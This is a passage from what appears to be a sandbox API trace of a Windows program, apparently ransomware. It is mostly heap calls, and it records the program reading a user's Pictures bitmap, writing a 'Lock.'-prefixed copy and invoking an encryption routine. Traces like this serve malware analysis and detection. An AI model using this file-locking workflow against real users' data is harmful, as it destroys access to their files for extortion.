hHeap=0x970000) returned 1 [0250.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0250.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0250.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0250.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0250.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0250.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0250.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0250.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0250.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0250.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0250.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0250.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0250.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0250.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0250.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0250.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0250.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0250.664] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Ndo_wHdmDfLw8EHAJ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ndo_whdmdflw8ehaj.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0250.665] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.665] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0250.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0250.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0250.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0250.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0250.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0250.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0250.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0250.666] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0250.666] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0250.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0250.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0250.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.666] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0250.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0250.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0250.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0250.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0250.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0250.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0250.668] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.Ndo_wHdmDfLw8EHAJ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.ndo_whdmdflw8ehaj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0250.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0250.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0250.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0250.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0250.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0250.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0250.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0250.669] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0250.669] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.669] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0250.669] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0250.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0250.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0250.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0250.670] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0250.670] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0xc4dc, lpOverlapped=0x0) returned 1 [0250.673] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0250.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0250.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4dc) returned 0x2f14010 [0250.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0250.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0250.675] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0250.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0250.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4dc) returned 0x2f14010 [0250.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54de8 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0250.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0250.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0250.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4dc) returned 0x2f2c9e0 [0250.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0250.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0250.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 